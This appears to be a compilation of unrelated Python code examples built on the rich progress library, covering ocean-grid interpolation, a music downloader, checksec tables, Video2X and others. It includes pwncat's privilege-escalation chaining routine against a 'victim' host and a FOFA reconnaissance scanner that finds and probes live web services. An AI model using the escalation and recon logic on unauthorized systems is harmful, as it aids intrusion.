    dst_depth = __interp2_thread(src_grid.lon_rho, src_grid.lat_rho, src_depth,
                                 child_grid.lon_rho, child_grid.lat_rho,
                                 pmap["pmaprho"], weight, nx, ny,
                                 child_grid.mask_rho)
    # Make a list of the fields we will interpolate
    smap = {}
    total_count = 0
    for v in vmap:
        fld = seapy.roms.fields.get(vmap[v], {"dims": 3})
        inc = 1
        # Only interpolate the fields we want in the destination
        if (vmap[v] not in ncout.variables) or (v not in ncsrc.variables):
            continue

        # If it is a field we want, determine the size of the field
        # to better track progress
        if fld["dims"] == 3:
            inc = child_grid.n
        if ("rotate" in fld):
            total_count += inc
            continue
        smap[v] = inc
        total_count += inc

    # Generate the list of records to process in each worker thread
    records = np.arange(0, ncsrc.variables[time].shape[0]) \
        if records is None else np.atleast_1d(records)

    # Set up the progress bar
    progress = Progress(
        TextColumn("[bold blue]{task.description:20s}", justify="center"),
        BarColumn(bar_width=None),
        "[progress.percentage]{task.percentage:>3.1f}%", ":",
        TimeElapsedColumn())

    # Do the work, marking the progress to the user
    with progress:
        _task_id = progress.add_task("", total=total_count, start=True)
        for src in smap:
            dest = vmap[src]
            progress.update(_task_id, description=dest)

            # Extra fields will probably be user tracers (biogeochemical)
            fld = seapy.roms.fields.get(dest, {"dims": 3})

            if fld["dims"] == 2:
                # Compute the max number of records to hold in memory
                maxrecs = np.maximum(
                    1,
                    np.minimum(
                        len(records),
                        int(_max_memory / (child_grid.lon_rho.nbytes +
                                           src_grid.lon_rho.nbytes))))
                for rn, recs in enumerate(seapy.chunker(records, maxrecs)):
                    outr = np.s_[rn *
                                 maxrecs:np.minimum((rn + 1) *
                                                    maxrecs, len(records))]
                    ndata = np.ma.array(Parallel(
                        n_jobs=threads,
                        max_nbytes=_max_memory)(delayed(__interp2_thread)(
                            src_grid.lon_rho, src_grid.lat_rho,
                            ncsrc.variables[src][i, :, :], child_grid.lon_rho,
                            child_grid.lat_rho, pmap["pmaprho"], weight, nx,
                            ny, child_grid.mask_rho) for i in recs),
                                        copy=False)
                    ncout.variables[dest][outr, :, :] = ndata
                    ncout.sync()
            else:
                maxrecs = np.maximum(
                    1,
                    np.minimum(
                        len(records),
                        int(_max_memory /
                            (child_grid.lon_rho.nbytes * child_grid.n +
                             src_grid.lon_rho.nbytes * src_grid.n))))
                for rn, recs in enumerate(seapy.chunker(records, maxrecs)):
                    outr = np.s_[rn *
                                 maxrecs:np.minimum((rn + 1) *
                                                    maxrecs, len(records))]
                    ndata = np.ma.array(Parallel(
                        n_jobs=threads,
                        max_nbytes=_max_memory)(delayed(__interp3_thread)(
                            src_grid.lon_rho,
                            src_grid.lat_rho,
                            src_grid.depth_rho,
                            ncsrc.variables[src][i, :, :, :],
                            child_grid.lon_rho,
                            child_grid.lat_rho,
                            child_grid.depth_rho,
                            pmap["pmaprho"],
                            weight,
                            nx,
                            ny,
                            child_grid.mask_rho,
                            up_factor=_up_scaling.get(dest, 1.0),
                            down_factor=_down_scaling.get(dest, 1.0))
                                                for i in recs),
                                        copy=False)

                    if z_mask:
                        __mask_z_grid(ndata, dst_depth, child_grid.depth_rho)

                    ncout.variables[dest][outr, :, :, :] = ndata
                    ncout.sync()

            progress.update(_task_id, advance=smap[src])

        # Rotate and Interpolate the vector fields. First, determine which
        # are the "u" and the "v" vmap fields
        try:
            velmap = {
                "u": list(vmap.keys())[list(vmap.values()).index("u")],
                "v": list(vmap.keys())[list(vmap.values()).index("v")]
            }
        except ValueError:
            warn("velocity not present in source file")
            return

        srcangle = getattr(src_grid, 'angle', None)
        dstangle = getattr(child_grid, 'angle', None)
        maxrecs = np.minimum(
            len(records),
            int(_max_memory / (2 *
                               (child_grid.lon_rho.nbytes * child_grid.n +
                                src_grid.lon_rho.nbytes * src_grid.n))))
        progress.update(_task_id, description="velocity")
        inc_count = child_grid.n / maxrecs
        for nr, recs in enumerate(seapy.chunker(records, maxrecs)):
            vel = Parallel(n_jobs=threads, max_nbytes=_max_memory)(
                delayed(__interp3_vel_thread)
                (src_grid.lon_rho, src_grid.lat_rho, src_grid.depth_rho,
                 srcangle, ncsrc.variables[velmap["u"]][i, :, :, :],
                 ncsrc.variables[velmap["v"]][i, :, :, :], child_grid.lon_rho,
                 child_grid.lat_rho, child_grid.depth_rho, dstangle,
                 pmap["pmaprho"], weight, nx, ny, child_grid.mask_rho)
                for i in recs)

            progress.update(_task_id, advance=inc_count * 2)
            for j in range(len(vel)):
                vel_u = np.ma.array(vel[j][0], copy=False)
                vel_v = np.ma.array(vel[j][1], copy=False)
                if z_mask:
                    __mask_z_grid(vel_u, dst_depth, child_grid.depth_rho)
                    __mask_z_grid(vel_v, dst_depth, child_grid.depth_rho)

                if child_grid.cgrid:
                    vel_u = seapy.model.rho2u(vel_u)
                    vel_v = seapy.model.rho2v(vel_v)

                ncout.variables["u"][nr * maxrecs + j, :] = vel_u
                ncout.variables["v"][nr * maxrecs + j, :] = vel_v

                if "ubar" in ncout.variables:
                    # Create ubar and vbar
                    # depth = seapy.adddim(child_grid.depth_u, vel_u.shape[0])
                    ncout.variables["ubar"][nr * maxrecs + j, :] = \
                        np.sum(vel_u * child_grid.depth_u, axis=0) /  \
                        np.sum(child_grid.depth_u, axis=0)
                    progress.update(_task_id, advance=inc_count)

                if "vbar" in ncout.variables:
                    # depth = seapy.adddim(child_grid.depth_v, vel_v.shape[0])
                    ncout.variables["vbar"][nr * maxrecs + j, :] = \
                        np.sum(vel_v * child_grid.depth_v, axis=0) /  \
                        np.sum(child_grid.depth_v, axis=0)
                    progress.update(_task_id, advance=inc_count)

                ncout.sync()

            progress.update(_task_id, advance=total_count)

    # Return the pmap that was used
    return pmap
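# Not part of the original example: a hedged sketch of how an internal helper
# like __interp_grids is typically driven, assuming seapy grids (via
# seapy.model.asgrid) and netCDF4 datasets; the file names are placeholders:
def interp_demo():
    import netCDF4
    import seapy

    src_grid = seapy.model.asgrid('parent_grid.nc')
    child_grid = seapy.model.asgrid('child_grid.nc')
    ncsrc = netCDF4.Dataset('parent_his.nc')
    ncout = netCDF4.Dataset('child_his.nc', 'a')
    try:
        # the returned pmap can be passed back in to skip recomputation
        pmap = __interp_grids(src_grid, child_grid, ncsrc, ncout,
                              records=[0, 1, 2], threads=2, z_mask=True)
    finally:
        ncsrc.close()
        ncout.close()
    return pmap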
Exemplo n.º 17
0
    def _escalate(
        self,
        progress: Progress,
        target_user: Optional[str] = None,
        exclude: Optional[List[str]] = None,
        depth: Optional[int] = None,
        chain: Optional[List["Technique"]] = None,
        starting_user=None,
    ) -> List[Tuple["Technique", str]]:
        """ Search for a technique chain which will gain access as the given
        user. """

        if chain is None:
            chain = []

        if exclude is None:
            exclude = []

        if target_user is None:
            target_user = "******"

        # Add a new task to this privesc progress
        task = progress.add_task(
            "description",
            from_user=pwncat.victim.whoami(),
            to_user=target_user,
            status="persistence",
            step="",
            total=40,
        )

        current_user = pwncat.victim.current_user
        if (target_user == current_user.name or current_user.id == 0
                or current_user.name == "root"):
            raise PrivescError(f"you are already {current_user.name}")

        if starting_user is None:
            starting_user = current_user

        if depth is not None and len(chain) > depth:
            raise PrivescError("max depth reached")

        # Capture current shell level
        shlvl = pwncat.victim.getenv("SHLVL")

        installed = list(pwncat.victim.persist.installed)

        # Check if we have a persistence method for this user
        for user, persist in installed:
            if not persist.local or (user != target_user and user is not None):
                continue
            progress.update(task, step=str(persist))
            # Attempt to escalate with the local persistence method
            if persist.escalate(target_user):

                # Stabilize the terminal
                pwncat.victim.reset(hard=False)

                # The method thought it worked, but didn't appear to
                if pwncat.victim.update_user() != target_user:
                    if pwncat.victim.getenv("SHLVL") != shlvl:
                        pwncat.victim.run("exit", wait=False)
                    continue

                # It worked!
                chain.append((PersistenceTechnique(persist,
                                                   target_user), "exit"))
                return chain

        # We update the status to enumerating and move the progress forward
        # but also stop the task to show the "pulsating" bar. This is because
        # we don't have a way of knowing how many things we will enumerate.
        progress.update(task, status="enumerating", step="initializing")

        # Enumerate escalation options for this user
        techniques = {}
        for method in self.methods:
            if method.id in exclude:
                continue
            try:
                found_techniques = method.enumerate(
                    progress,
                    task,
                    Capability.SHELL | Capability.WRITE | Capability.READ,
                )
                for tech in found_techniques:
                    progress.update(task, step=str(tech))
                    if tech.user not in techniques:
                        techniques[tech.user] = []
                    techniques[tech.user].append(tech)
            except PrivescError:
                pass

        # Try to escalate directly to the target if possible
        if target_user in techniques:
            progress.update(task,
                            status="escalating",
                            step="[yellow]direct escalation[/yellow]")
            try:
                tech, exit_command = self.escalate_single(
                    techniques[target_user], shlvl, progress, task)
                pwncat.victim.reset(hard=False)
                pwncat.victim.update_user()
                chain.append((tech, exit_command))
                return chain
            except PrivescError:
                pass

        # Try to use persistence as other users
        progress.update(task, status="persistence", step="initializing")
        for user, persist in installed:
            if self.in_chain(user, chain):
                continue
            progress.update(task, step=persist.format(user))
            if persist.escalate(user):

                # Ensure history and prompt are correct
                pwncat.victim.reset()

                # Update the current user
                if pwncat.victim.update_user() != user:
                    if pwncat.victim.getenv("SHLVL") != shlvl:
                        pwncat.victim.run("exit", wait=False)
                    continue

                chain.append((PersistenceTechnique(persist, user), "exit"))

                try:
                    return self._escalate(progress, target_user, exclude,
                                          depth, chain, starting_user)
                except PrivescError:
                    chain.pop()
                    pwncat.victim.run("exit", wait=False)

                # Don't retry later
                if user in techniques:
                    del techniques[user]

        progress.update(task, status="recursing")

        # We can't escalate directly to the target. Instead, try recursively
        # against other users.
        for user, techs in techniques.items():
            if user == target_user:
                continue
            if self.in_chain(user, chain):
                continue
            try:
                progress.update(task,
                                step=f"escalating to [green]{user}[/green]")
                tech, exit_command = self.escalate_single(
                    techs, shlvl, progress, task)

                chain.append((tech, exit_command))
                pwncat.victim.reset(hard=False)
                pwncat.victim.update_user()
            except PrivescError:
                continue
            try:
                progress.update(
                    task, step=f"success, recursing as [green]{user}[/green]")
                return self._escalate(progress, target_user, exclude, depth,
                                      chain, starting_user)
            except PrivescError:
                tech, exit_command = chain[-1]
                pwncat.victim.run(exit_command, wait=False)
                chain.pop()

        raise PrivescError(f"no route to {target_user} found")
Exemplo n.º 18
0
class DisplayManager:
    def __init__(self):

        # ! Change color system if on a "legacy" Windows terminal to prevent wrong colors displaying
        self.is_legacy = detect_legacy_windows()

        # ! dumb_terminals automatically handled by rich. Color system is too but it is incorrect
        # ! for legacy windows ... so no color for y'all.
        self.console = Console(
            theme=custom_theme, color_system="truecolor" if not self.is_legacy else None
        )

        self._rich_progress_bar = Progress(
            SizedTextColumn(
                "[white]{task.description}",
                overflow="ellipsis",
                width=int(self.console.width / 3),
            ),
            SizedTextColumn("{task.fields[message]}", width=18, style="nonimportant"),
            BarColumn(bar_width=None, finished_style="green"),
            "[progress.percentage]{task.percentage:>3.0f}%",
            TimeRemainingColumn(),
            console=self.console,
            # ! Normally when you exit the progress context manager (or call stop())
            # ! the last refreshed display remains in the terminal with the cursor on
            # ! the following line. You can also make the progress display disappear on
            # ! exit by setting transient=True on the Progress constructor
            transient=self.is_legacy,
        )

        self.song_count = 0
        self.overall_task_id = None
        self.overall_progress = 0
        self.overall_total = 100
        self.overall_completed_tasks = 0
        self.quiet = False

        # ! Basically a wrapper for rich's: with ... as ...
        self._rich_progress_bar.__enter__()

    def print(self, *text, color="green"):
        """
        `text` : `any`  Text to be printed to screen
        Use this self.print to replace default print().
        """

        if self.quiet:
            return

        line = "".join(str(item) + " " for item in text)
        if color:
            self._rich_progress_bar.console.print(f"[{color}]{line}")
        else:
            self._rich_progress_bar.console.print(line)

    def set_song_count_to(self, song_count: int) -> None:
        """
        `int` `song_count` : number of songs being downloaded
        RETURNS `~`
        sets the size of the progressbar based on the number of songs in the current
        download set
        """

        # ! all calculations are based of the arbitrary choice that 1 song consists of
        # ! 100 steps/points/iterations
        self.song_count = song_count

        self.overall_total = 100 * song_count

        if self.song_count > 4:
            self.overall_task_id = self._rich_progress_bar.add_task(
                description="Total",
                process_id="0",
                message=f"{self.overall_completed_tasks}/{int(self.overall_total / 100)} complete",
                total=self.overall_total,
                visible=(not self.quiet),
            )

    def update_overall(self):
        """
        Updates the overall progress bar.
        """

        # If the overall progress bar exists
        if self.overall_task_id is not None:
            self._rich_progress_bar.update(
                self.overall_task_id,
                message=f"{self.overall_completed_tasks}/{int(self.overall_total / 100)} complete",
                completed=self.overall_progress,
            )

    def new_progress_tracker(self, songObj):
        """
        returns new instance of `_ProgressTracker` that follows the `songObj` download subprocess
        """
        return _ProgressTracker(self, songObj)

    def close(self) -> None:
        """
        clean up rich
        """

        self._rich_progress_bar.stop()
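# Not part of the original example: a usage sketch for DisplayManager; the
# song count and messages are illustrative (one song = 100 progress points):
if __name__ == '__main__':
    display = DisplayManager()
    display.set_song_count_to(5)
    display.print('Queued 5 songs', color='blue')
    display.overall_progress += 100  # one full song completed
    display.overall_completed_tasks += 1
    display.update_overall()
    display.close()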
Exemplo n.º 19
0
class RichOutput(AbstractChecksecOutput):
    def __init__(self):
        """Init Rich Console and Table"""
        super().__init__()
        # init ELF table
        self.table_elf = Table(title="Checksec Results: ELF", expand=True)
        self.table_elf.add_column("File", justify="left", header_style="")
        self.table_elf.add_column("NX", justify="center")
        self.table_elf.add_column("PIE", justify="center")
        self.table_elf.add_column("Canary", justify="center")
        self.table_elf.add_column("Relro", justify="center")
        self.table_elf.add_column("RPATH", justify="center")
        self.table_elf.add_column("RUNPATH", justify="center")
        self.table_elf.add_column("Symbols", justify="center")
        self.table_elf.add_column("FORTIFY", justify="center")
        self.table_elf.add_column("Fortified", justify="center")
        self.table_elf.add_column("Fortifiable", justify="center")
        self.table_elf.add_column("Fortify Score", justify="center")

        # init PE table
        self.table_pe = Table(title="Checksec Results: PE", expand=True)
        self.table_pe.add_column("File", justify="left", header_style="")
        self.table_pe.add_column("NX", justify="center")
        self.table_pe.add_column("Canary", justify="center")
        self.table_pe.add_column("ASLR", justify="center")
        self.table_pe.add_column("Dynamic Base", justify="center")
        self.table_pe.add_column("High Entropy VA", justify="center")
        self.table_pe.add_column("SEH", justify="center")
        self.table_pe.add_column("SafeSEH", justify="center")
        self.table_pe.add_column("Force Integrity", justify="center")
        self.table_pe.add_column("Control Flow Guard", justify="center")
        self.table_pe.add_column("Isolation", justify="center")

        # init console
        self.console = Console()

        # build progress bar
        self.process_bar = Progress(
            TextColumn("[bold blue]Processing...", justify="left"),
            BarColumn(bar_width=None),
            "{task.completed}/{task.total}",
            "•",
            "[progress.percentage]{task.percentage:>3.1f}%",
            console=self.console,
        )
        self.display_res_bar = Progress(
            BarColumn(bar_width=None),
            TextColumn("[bold blue]{task.description}", justify="center"),
            BarColumn(bar_width=None),
            console=self.console,
            transient=True,
        )
        self.enumerate_bar = Progress(
            TextColumn("[bold blue]Enumerating...", justify="center"),
            BarColumn(bar_width=None),
            console=self.console,
            transient=True,
        )

        self.process_task_id = None

    def __exit__(self, exc_type, exc_val, exc_tb):
        # cleanup the Rich progress bars
        if self.enumerate_bar is not None:
            self.enumerate_bar.stop()
        if self.process_bar is not None:
            self.process_bar.stop()
        if self.display_res_bar is not None:
            self.display_res_bar.stop()

    def enumerating_tasks_start(self):
        # start progress bar
        self.enumerate_bar.start()
        self.enumerate_bar.add_task("Enumerating", start=False)

    def enumerating_tasks_stop(self, total: int):
        super().enumerating_tasks_stop(total)
        self.enumerate_bar.stop()
        self.enumerate_bar = None

    def processing_tasks_start(self):
        # init progress bar
        self.process_bar.start()
        self.process_task_id = self.process_bar.add_task("Checking",
                                                         total=self.total)

    def add_checksec_result(self, filepath: Path,
                            checksec: Union[ELFChecksecData, PEChecksecData]):
        if isinstance(checksec, ELFChecksecData):
            # display results
            if not checksec.nx:
                nx_res = "[red]No"
            else:
                nx_res = "[green]Yes"

            pie = checksec.pie
            if pie == PIEType.No:
                pie_res = f"[red]{pie.name}"
            elif pie == PIEType.DSO:
                pie_res = f"[yellow]{pie.name}"
            else:
                pie_res = "[green]Yes"

            if not checksec.canary:
                canary_res = "[red]No"
            else:
                canary_res = "[green]Yes"

            relro = checksec.relro
            if relro == RelroType.No:
                relro_res = f"[red]{relro.name}"
            elif relro == RelroType.Partial:
                relro_res = f"[yellow]{relro.name}"
            else:
                relro_res = f"[green]{relro.name}"

            if checksec.rpath:
                rpath_res = "[red]Yes"
            else:
                rpath_res = "[green]No"

            if checksec.runpath:
                runpath_res = "[red]Yes"
            else:
                runpath_res = "[green]No"

            if checksec.symbols:
                symbols_res = "[red]Yes"
            else:
                symbols_res = "[green]No"

            fortified_count = checksec.fortified
            if checksec.fortify_source:
                fortify_source_res = "[green]Yes"
            else:
                fortify_source_res = "[red]No"

            if fortified_count == 0:
                fortified_res = "[red]No"
            else:
                fortified_res = f"[green]{fortified_count}"

            fortifiable_count = checksec.fortifiable
            if fortified_count == 0:
                fortifiable_res = "[red]No"
            else:
                fortifiable_res = f"[green]{fortifiable_count}"

            if checksec.fortify_score == 0:
                fortified_score_res = f"[red]{checksec.fortify_score}"
            elif checksec.fortify_score == 100:
                fortified_score_res = f"[green]{checksec.fortify_score}"
            else:
                fortified_score_res = f"[yellow]{checksec.fortify_score}"

            self.table_elf.add_row(
                str(filepath),
                nx_res,
                pie_res,
                canary_res,
                relro_res,
                rpath_res,
                runpath_res,
                symbols_res,
                fortify_source_res,
                fortified_res,
                fortifiable_res,
                fortified_score_res,
            )
        elif isinstance(checksec, PEChecksecData):
            if not checksec.nx:
                nx_res = "[red]No"
            else:
                nx_res = "[green]Yes"

            if not checksec.canary:
                canary_res = "[red]No"
            else:
                canary_res = "[green]Yes"

            if not checksec.aslr:
                aslr_res = "[red]No"
            else:
                aslr_res = "[green]Yes"

            if not checksec.dynamic_base:
                dynamic_base_res = "[red]No"
            else:
                dynamic_base_res = "[green]Yes"

            # this is only relevant if the binary is 64 bits
            if checksec.machine == MACHINE_TYPES.AMD64:
                if not checksec.high_entropy_va:
                    entropy_va_res = "[red]No"
                else:
                    entropy_va_res = "[green]Yes"
            else:
                entropy_va_res = "/"

            if not checksec.seh:
                seh_res = "[red]No"
            else:
                seh_res = "[green]Yes"

            # only relevant if 32 bits
            if checksec.machine == MACHINE_TYPES.I386:
                if not checksec.safe_seh:
                    safe_seh_res = "[red]No"
                else:
                    safe_seh_res = "[green]Yes"
            else:
                safe_seh_res = "/"

            if not checksec.force_integrity:
                force_integrity_res = "[red]No"
            else:
                force_integrity_res = "[green]Yes"

            if not checksec.guard_cf:
                guard_cf_res = "[red]No"
            else:
                guard_cf_res = "[green]Yes"

            if not checksec.isolation:
                isolation_res = "[red]No"
            else:
                isolation_res = "[green]Yes"

            self.table_pe.add_row(
                str(filepath),
                nx_res,
                canary_res,
                aslr_res,
                dynamic_base_res,
                entropy_va_res,
                seh_res,
                safe_seh_res,
                force_integrity_res,
                guard_cf_res,
                isolation_res,
            )
        else:
            raise NotImplementedError

    def checksec_result_end(self):
        """Update progress bar"""
        self.process_bar.update(self.process_task_id, advance=1)

    def print(self):
        self.process_bar.stop()
        self.process_bar = None

        if self.table_elf.row_count > 0:
            with self.display_res_bar:
                task_id = self.display_res_bar.add_task(
                    "Displaying Results: ELF ...", start=False)
                self.console.print(self.table_elf)
                self.display_res_bar.remove_task(task_id)
        if self.table_pe.row_count > 0:
            with self.display_res_bar:
                task_id = self.display_res_bar.add_task(
                    "Displaying Results: PE ...", start=False)
                self.console.print(self.table_pe)
                self.display_res_bar.remove_task(task_id)

        self.display_res_bar.stop()
        self.display_res_bar = None
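# Not part of the original example: a usage sketch for RichOutput; a real run
# would pass an ELFChecksecData/PEChecksecData instance produced by the
# checksec analysis (elided here):
if __name__ == '__main__':
    output = RichOutput()
    output.enumerating_tasks_start()
    output.enumerating_tasks_stop(total=1)
    output.processing_tasks_start()
    # output.add_checksec_result(Path('/bin/ls'), checksec_data)
    output.checksec_result_end()
    output.print()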
Exemplo n.º 20
0
progress_group = Panel(Group(
    Group(current_app_progress, step_progress, app_steps_progress),
    Panel(overall_progress, box=box.HORIZONTALS),
),
                       box=box.ASCII)

# tuple specifies how long each step takes for that app
step_actions = ("downloading", "configuring", "building", "installing")
apps = [
    ("one", (2, 1, 4, 2)),
    ("two", (1, 3, 8, 4)),
    ("three", (2, 1, 3, 2)),
]

# create overall progress bar
overall_task_id = overall_progress.add_task("", total=len(apps))

# use own live instance as context manager with group of progress bars,
# which allows for running multiple different progress bars in parallel,
# and dynamically showing/hiding them
with Live(progress_group):

    for idx, (name, step_times) in enumerate(apps):
        # update message on overall progress bar
        top_descr = "[bold #AAAAAA](%d out of %d apps installed)" % (idx,
                                                                     len(apps))
        overall_progress.update(overall_task_id, description=top_descr)

        # add progress bar for steps of this app, and run the steps
        current_task_id = current_app_progress.add_task("Installing app %s" %
                                                        name)
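# Not part of the original snippet: the progress bars it groups are defined
# earlier in the (truncated) source. A minimal sketch of how such sub-bars are
# typically assembled, assuming only the rich API; the columns are illustrative:
from rich.progress import (BarColumn, Progress, SpinnerColumn, TextColumn,
                           TimeElapsedColumn)

current_app_progress = Progress(TimeElapsedColumn(),
                                TextColumn("{task.description}"))
step_progress = Progress(TextColumn("  "), TimeElapsedColumn(),
                         SpinnerColumn("dots"),
                         TextColumn("{task.description}"))
app_steps_progress = Progress(
    TextColumn("[bold blue]{task.description}"), BarColumn(),
    TextColumn("({task.completed} of {task.total} steps done)"))
overall_progress = Progress(TimeElapsedColumn(), BarColumn(),
                            TextColumn("{task.description}"))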
Exemplo n.º 21
0
class Fofa:
    def __init__(self, targets, fofa_result):
        super(Fofa, self).__init__()
        self.email = fofaApi['email']
        self.key = fofaApi['key']
        self.fofa_result = fofa_result
        self.targets = targets
        self.result_urls = []  # web services found by the FOFA query
        self.urls_list = []  # for deduplication
        self.life_urls = []  # web services verified to be alive
        self.urls = []  # FOFA query URLs, consumed by the async coroutines
        self.count = 30  # how many targets to query FOFA for at once
        self.session = conn_pool()  # use a connection pool
        self.headers = {
            "Cache-Control":
            "max-age=0",
            "User-Agent":
            random.choice(USER_AGENTS),
            "Upgrade-Insecure-Requests":
            "1",
            "Accept":
            "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        }

        self.process = Progress(
            "[progress.description]{task.description}",
            BarColumn(),
            "[progress.percentage]{task.percentage:>3.1f}%",
            "•",
            "[bold green]{task.completed}/{task.total}",
            "•",
            TransferSpeedColumn(),
            "•",
            TimeRemainingColumn(),
            transient=True,  # hide the progress bar once it reaches 100%
        )
        self.fofa_progress_bar = self.process.add_task("[cyan]FOFA search...",
                                                       total=len(self.targets))

        self.web_progress_bar = None

    def run(self):
        try:
            with self.process:
                self.target_formatting()  # build the FOFA query URLs

                loop = asyncio.get_event_loop()
                loop.run_until_complete(self.fetch_all(loop))  # FOFA search

                self.session.close()
                self.is_life()  # take the web services out of the FOFA results, then verify each one is reachable
        except Exception as e:
            logger.log("ERROR", e)
        return self.life_urls

    # To avoid getting IP-banned by FOFA for querying too fast, split the targets
    # into groups of 30 and join each group with the || syntax, so several
    # targets are queried at once
    def target_formatting(self):
        for i in range(0, len(self.targets), self.count):
            keyword = ''
            targets = self.targets[i:i + self.count]
            for host in targets:
                host = host.replace('\n', '').replace('\r', '').strip()
                keyword += f'"{host}" || '

            keyword = keyword[:-4]  # strip the trailing ||
            keywordsBs = base64.b64encode(keyword.encode('utf-8'))
            keywordsBs = keywordsBs.decode('utf-8')

            url = "https://fofa.so/api/v1/search/all?email={0}&key={1}&qbase64={2}&full=true&fields=ip,title,port,domain,protocol,host,country,header&size={3}".format(
                self.email, self.key, keywordsBs, fofaSize)

            self.urls.append(url)

    # Callback: refresh the progress bar
    def callback(self, future, progress_bar, count):
        self.process.advance(progress_bar, advance=count)

    async def fetch_all(self, loop):
        # loop = asyncio.get_event_loop()
        # asyncio.set_event_loop(loop)

        tasks = []
        # Only after writing this did I find that aiohttp doesn't support HTTPS
        # proxies, so use loop.run_in_executor() to run the blocking requests library instead
        # async with aiohttp.ClientSession(connector=aiohttp.TCPConnector(ssl=False), headers=headers) as session:
        threads = ThreadPoolExecutor(10)
        for url in self.urls:
            # task = asyncio.ensure_future(self.fetch(session, url, sem))
            task = loop.run_in_executor(threads, self.fetch, url)
            task.add_done_callback(
                partial(self.callback,
                        progress_bar=self.fofa_progress_bar,
                        count=self.count))
            tasks.append(task)
        if platform.system() != "Windows":
            import uvloop
            asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())

        await asyncio.wait(tasks)

    def fetch(self, url):
        try:
            self.session.headers = self.headers

            # self.session.proxies = {
            #     "https": "http://127.0.0.1:8080"
            # }

            response = self.session.get(url, timeout=10)
            if response.status_code == 200:
                datas = json.loads(response.text)
                # 查询结果没有出错时
                if not datas['error']:
                    self.target_info(datas['results'])
            else:
                logger.log("ERROR", f'fofa 查询失败,{response.status_code }')
        except Exception as e:
            logger.log("ERROR", e)
            pass

    def target_info(self, datas):
        for data in datas:
            # ip,title,port,domain,protocol,host,country,header
            # ['127.0.0.1', 'Welcome to CentOS', '443', '', '', '127.0.0.1:443', 'CN', 'HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4833\r\nAccept-Ranges: bytes\r\nContent-Type: text/html\r\nDate: Sun, 22 Nov 2020 10:40:22 GMT\r\nEtag: "53762af0-12e1"\r\nLast-Modified: Fri, 16 May 2014 15:12:48 GMT\r\nServer: nginx/1.16.1']
            # Only keep results for the configured country (default: CN)
            if data[6] == fofaCountry:
                # if data[4] == "http" or data[4] == "https" or "http" in data[5]:
                if 'HTTP/1.' in data[7]:
                    if "http://" in data[5] or "https://" in data[5]:
                        url = data[5]
                    elif not data[4]:
                        url = "http://{1}".format(data[4], data[5])
                    else:
                        url = "{0}://{1}".format(data[4], data[5])
                    self.result_urls.append(url)

    async def crawler(self, url, semaphore):
        async with semaphore:
            try:
                async with aiohttp.ClientSession(
                        connector=aiohttp.TCPConnector(ssl=False),
                        headers=self.headers) as session:
                    async with session.get(url, timeout=6) as resp:
                        if url in self.urls_list or url in fofa_list:  # already recorded
                            return
                        fofa_list.append(url)
                        text = await resp.text()
                        m = re.search('<title>(.*?)</title>', text)
                        title = m.group(1) if m else ''
                        status = resp.status
                        if status == 200 or status == 404 or status == 403:
                            self.urls_list.append(url)
                            self.life_urls.append((url, title))
                            self.fofa_result.put((url, title))
            except Exception:
                pass

    # Filter for live web services
    def is_life(self):
        if len(self.result_urls) == 0:
            return

        self.fofa_progress_bar = self.process.add_task(
            "[cyan]FOFA Web results verify valid...",
            total=len(self.result_urls))

        loop = asyncio.new_event_loop()
        asyncio.set_event_loop(loop)
        sem = asyncio.Semaphore(2000)  # cap the concurrency
        tasks = []
        for url in self.result_urls:
            task = loop.create_task(self.crawler(url, sem))
            task.add_done_callback(
                partial(self.callback,
                        progress_bar=self.fofa_progress_bar,
                        count=1))
            tasks.append(task)

        loop.run_until_complete(asyncio.wait(tasks))
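# Not part of the original example: a usage sketch for the Fofa class; the
# fofaApi credentials come from config, the target list is a placeholder, and
# fofa_result collects (url, title) tuples for live web services:
if __name__ == '__main__':
    from queue import Queue

    fofa_result = Queue()
    targets = ['example.com']
    life_urls = Fofa(targets, fofa_result).run()
    print(life_urls)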
Exemplo n.º 22
0
class Video2X:
    """
    Video2X class

    provides two vital functions:
        - upscale: perform upscaling on a file
        - interpolate: perform motion interpolation on a file
    """

    def __init__(self) -> None:
        self.version = __version__

    def _get_video_info(self, path: pathlib.Path) -> tuple:
        """
        get video file information with FFmpeg

        :param path pathlib.Path: video file path
        :raises RuntimeError: raised when video stream isn't found
        """
        # probe video file info
        logger.info("Reading input video information")
        for stream in ffmpeg.probe(path)["streams"]:
            if stream["codec_type"] == "video":
                video_info = stream
                break
        else:
            raise RuntimeError("unable to find video stream")

        # get total number of frames to be processed
        capture = cv2.VideoCapture(str(path))

        # check if file is opened successfully
        if not capture.isOpened():
            raise RuntimeError("OpenCV has failed to open the input file")

        total_frames = int(capture.get(cv2.CAP_PROP_FRAME_COUNT))
        frame_rate = capture.get(cv2.CAP_PROP_FPS)

        return video_info["width"], video_info["height"], total_frames, frame_rate

    def _toggle_pause(self, _signal_number: int = -1, _frame=None):
        # print console messages and update the progress bar's status
        if self.pause.value is False:
            self.progress.update(self.task, description=self.description + " (paused)")
            self.progress.stop_task(self.task)
            logger.warning("Processing paused, press Ctrl+Alt+V again to resume")

        elif self.pause.value is True:
            self.progress.update(self.task, description=self.description)
            logger.warning("Resuming processing")
            self.progress.start_task(self.task)

        # invert the value of the pause flag
        with self.pause.get_lock():
            self.pause.value = not self.pause.value

    def _run(
        self,
        input_path: pathlib.Path,
        width: int,
        height: int,
        total_frames: int,
        frame_rate: float,
        output_path: pathlib.Path,
        output_width: int,
        output_height: int,
        Processor: object,
        mode: str,
        processes: int,
        processing_settings: tuple,
    ) -> None:

        # record original STDOUT and STDERR for restoration
        original_stdout = sys.stdout
        original_stderr = sys.stderr

        # create console for rich's Live display
        console = Console()

        # redirect STDOUT and STDERR to console
        sys.stdout = FileProxy(console, sys.stdout)
        sys.stderr = FileProxy(console, sys.stderr)

        # re-add Loguru to point to the new STDERR
        logger.remove()
        logger.add(sys.stderr, colorize=True, format=LOGURU_FORMAT)

        # initialize values
        self.processor_processes = []
        self.processing_queue = multiprocessing.Queue(maxsize=processes * 10)
        processed_frames = multiprocessing.Manager().list([None] * total_frames)
        self.processed = multiprocessing.Value("I", 0)
        self.pause = multiprocessing.Value(ctypes.c_bool, False)

        # set up and start decoder thread
        logger.info("Starting video decoder")
        self.decoder = VideoDecoder(
            input_path,
            width,
            height,
            frame_rate,
            self.processing_queue,
            processing_settings,
            self.pause,
        )
        self.decoder.start()

        # set up and start encoder thread
        logger.info("Starting video encoder")
        self.encoder = VideoEncoder(
            input_path,
